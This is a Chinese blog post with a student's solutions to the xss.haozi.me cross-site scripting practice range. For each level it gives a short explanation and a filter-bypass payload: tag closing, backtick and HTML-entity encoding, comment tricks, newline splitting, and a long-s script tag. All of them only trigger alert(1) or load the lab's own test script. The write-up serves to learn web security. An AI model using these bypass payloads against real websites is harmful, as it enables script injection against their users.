xss.haozi.me

最新推荐文章于 2024-03-13 08:00:00 发布
最新推荐文章于 2024-03-13 08:00:00 发布
阅读量5k 收藏 17
点赞数 7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/95094759
版权

集训第二周 星期一(上)

在这里插入图片描述第二个星期了,再发一篇。感觉自己好像没学什么东西。就学了个HTML和JavaScript。今天开始XSS的实战,这篇博客主要就是写一下题解。
先给出XSS靶场的地址: https://xss.haozi.me/#/0x00 我是在谷歌上写的,不知道为什么同样的payload在火狐上不能用。

0x00

第一关应该没什么讲的吧,啥都没有,直接给payload了。

<img src="x" onerror="alert(1)">

在这里插入图片描述

0x01

这一关,就是考了个最基本的标签闭合,感觉有点想SQL注入,哈哈。就是把前面和后面的textarea给闭合掉,让后再写核心代码就行了,我讲一下这个img吧,他是用来给页面加入图片的,图片的地址就是由src来设置的,然后后面那个onerror是一个事件,就是一旦出错,就会执行里面的JavaScript代码。所以我们就把图片的地址胡写一个,让后程序出错,最后执行JavaScript代码,完美。

</textarea><img src="x" onerror="alert(1)"><textarea>

在这里插入图片描述

0x02

这关照样和SQL注入差不多,上一关是闭合整个标签,这次就闭合一半,使用“>把前面的标签给闭合了,然后再写自己的标签

"><img src="x" onerror="alert(1)">

在这里插入图片描述

0x03

这一关,就涉及到了过滤,这不和SQL注入过滤一样吗,但这个应该不能预编译吧,哈哈。这道题就是过滤了括号,绕过括号的方法好像很多,但是我目前就知道一种,就是用反引号。来来来,上payload

<img src="x" onerror="alert`1`">

在这里插入图片描述

0x04

这一题,极其的魔性,不知道为什么我在火狐上过不去。这道题把括号和反引号都过滤了,但是完美还可以用HTML编码绕过,有点类似于SQL注入的url编码绕过。

<img src="x" onerror="alert&#40;1&#41;">

在这里插入图片描述

0x05

这一题用到了一些比较冷的知识,我也不知道,看了别人的,原来–!>也能闭合<!–,涨知识了。

--!><img src="x" onerror="alert(1)"><!--

在这里插入图片描述

0x06

过滤了以on开头,以=号结尾的字符,我们就用换行符绕过

type="image" src="xxx" onerror

="alert(1)"

在这里插入图片描述

0x07

匹配了尖括号<>开头结尾的字符串替换为空.可以通过少输入一个>来绕过正则,但仍然可以执行.我也不知道为啥这样也行,感觉HTML的容错率也太高了,这样都行,刚学完C++的我,感觉极其不适应。

<img src="x" onerror="alert(1)"

在这里插入图片描述

0x08

这里还有一个问题,他把"<\style>"过滤了,正常思虑是换行绕过,但是我发现必须把“>“给换到下一行才行,再多加一个字符都不行,不知道为啥。请高人指点。

</style
>
<img src="x" onerror="alert(1);">

在这里插入图片描述

0x09

这一关就是必须要输入一个指定的URL而已,没有对输入进行任何过滤。

https://www.segmentfault.com"></script><img src="x" onerror="alert(1)">

在这里插入图片描述

0x0A

看了看题解,但发现题解的方法我用不了啊,不知道为啥。这又用到一个知识点,就是@,如果你访问 www.baidu.com@www.google.com,那么你最后进入的是谷歌的界面,所以这一关,就在自己的服务器上放一个js文件,写上“alert(1)”。但不知道我的不行。就先给出别人的payload吧。xss.haozi.me/j.js 这是题目作者自己写的js文件。

https://www.segmentfault.com@xss.haozi.me/j.js

0x0B

这一关把所有的字符都变成了大写,HTML对大小写是不敏感的,但是JavaScript对大小写敏感,所以我们需要把JavaScript的函数,给编码一下,这里我发现,好像只有字母和括号可以用编码绕过,但要是单引号双引号之类的,就不行了,不知道自己感觉的对不对。

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

在这里插入图片描述

0x0C

就是多过滤了一个script,直接用上一关的payload就行了。

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

在这里插入图片描述

0x0D

写了个alert()但是却不让用,这个注释符只能注释一行,打个换行就可以了,但是我不明白为什么后面那个–>非要再换一行,如果不换,就过不去,这是个啥原理。


alert(1);
-->

在这里插入图片描述

0x0E

匹配了所有<与字母的组合.

即<s无法使用.

但是ſ大写后为S,且其ascii值不与s相等,因此可以绕过.虽然我的又不能,没事,我已经习惯了。

<ſcript src="https://xss.haozi.me/j.js"></script>

0x0F

这一关不会,看来题解,就更不懂了,为啥他把单引号编码之后还可以用,那这过滤个锤子,哎,不明白啊不明白。

');alert(1)//

在这里插入图片描述

0x10

这一题没啥好说的,只能说自己写的题太少了。

1;alert(1)

在这里插入图片描述

0x12

过滤了一些东西,但他不是替换为空,而是给转义了,那我们就把转义符给转义了,试试。

\");alert(1);</script>

在这里插入图片描述啊,终于写完了,但其实没有完,还有一个靶场没写了,没事,问题不大。慢慢来吧。

沐目_01
关注
  • 7
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
xss.js.zip
07-29
"xss.js.zip"是一个专注于防止XSS攻击的JavaScript模块,它通过严格的输入过滤和白名单策略来确保用户提交的内容不会引入潜在的恶意代码。 首先,"xss.js"的核心功能在于提供了一套完整的输入过滤机制。这个模块会...
xss靶场、xss.haozi.me靶场详细通关教程
LawnCat的博客
03-27 2272
该靶场来自xss.haozi.me,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。
XXS靶场haozi
m0_61579490的博客
08-02 466
XXS靶场之线上靶场haozi
xss.haozi练习通关详解
金色%夕阳的博客
08-01 1937
xss.haozi练习通关概述 0x00 分析: 执行: 0x01 分析: 执行: 0x02 分析: 执行: 0x03 分析: 执行: 0x04 分析: 执行: 0x05 分析: 执行: 0x06 分析: 执行: 0x07
xss.haozi.me通关教程
自强不息
02-01 1192
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
xss.haozi.me靶场“0x00-0x0A”通关教程
钟言的博客
03-12 5374
本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程,详细内容包含了:一、靶场介绍 二、第一关 0x00 不做限制 三、第二关 0x01 文本闭合标签绕过 四、第三关 0x02 双引号闭合绕过 五、第四关 0x03 过滤括号 六、第五关 0x04 编码绕过 七、第六关 0x05 注释闭合绕过 八、第七关 0x06 换行绕过 九、第八关 0x07 删除标签 十、第九关 0x08 多加空格绕过 十一、第十关 0x09 闭合绕过 十二、第十一关 0x0A JS调用等内容
XSS.rar_XSS
09-22
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全问题,尤其是在Web前端开发中尤为突出。XSS攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户数据、操纵用户界面或者执行其他有害操作。以下...
SpringBoot整合XSS.zip
04-30
1. **XSS攻击简介**:XSS(Cross Site Scripting)是一种常见的网络攻击方式,攻击者通过在网页上注入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而获取敏感信息或执行恶意操作。XSS攻击通常分为反射型、...
xss.me自动攻击跨站搭建教材
05-01
搭建网站环境,我这里用的是APMServ 5.2.6。注意APMServ程序所在路径不能含有汉字和空格。
Jquery XSS.zip
08-24
标题中的“Jquery XSS.zip”表明这是一个关于jQuery与跨站脚本(XSS)漏洞相关的压缩包文件。在Web开发中,jQuery是一个广泛使用的JavaScript库,它简化了HTML文档遍历、事件处理、动画和Ajax交互。而XSS,全称Cross...
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2084
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
Xss.haozi在线练习靶场1-19关(带答案及靶场地址)
2301_78238055的博客
08-22 570
一个在线的XSS练习靶场19关全带通关答案
xss靶场练习之xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 750
靶场绕过
XSS.haozi.me靶场通关记录
qq_52321903的博客
04-04 157
XSS.haozi.me靶场是一个部署在Github的在线靶场,并且是一个白盒,就是说我们能够直接看到页面源代码,所以直接根据源码来判断该使用什么方法绕过。XSS绕过方法:闭合标签绕过绕过小括号、双引号、单引号利用反引号``编码绕过(利用实体编码、unicode编码绕过混淆绕过(利用html语法不严格、容错性)换行 缺失>闭合的标签 空格、TAB关键字绕过大小写绕过编码绕过字符拼接空格绕过利用/代替空格编码绕过(利用实体编码、unicode编码绕过)利用eval等方法绕过。
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2032
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场。XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi.me弹窗练习0x00-0x10
weixin_52159400的博客
07-28 317
alert(1)
xss.haozi.me在线靶机挑战
m0_49137360的博客
08-01 429
xss.haozi.me靶场练习
xss.haozi.me靶场“0x0B-0x12”通关教程
最新发布
钟言的博客
03-13 4521
本篇xss.haozi.me靶场的“0x0B-0x12”通关教程,详细内容包含了一、0x0B 实体编码绕过 二、0x0C script绕过 三、0x0D 注释绕过 四、0X0E ſ符号绕过 五、0x0F 编码解码 六、0x10 直接执行 七、0x11 闭合绕过 八、0x12 闭合绕过等内容
xss靶场练习(一)之xss.haozi.me
angry_program的博客
01-29 7406
目录 前言 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0F 0x10 0x11 0x12 前言 xss实战第一部曲, 实战的靶场是部署在github上的, 所以可能有些延迟(你懂的), 然后给出地址: https://xss.hao...
xss .htaccess apache
07-27
针对防止XSS攻击,可以通过在Apache服务器上使用.htaccess文件来进行配置。.htaccess是用于在Apache服务器上设置网站配置的文件。 要防止XSS攻击,您可以添加以下代码到.htaccess文件中: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值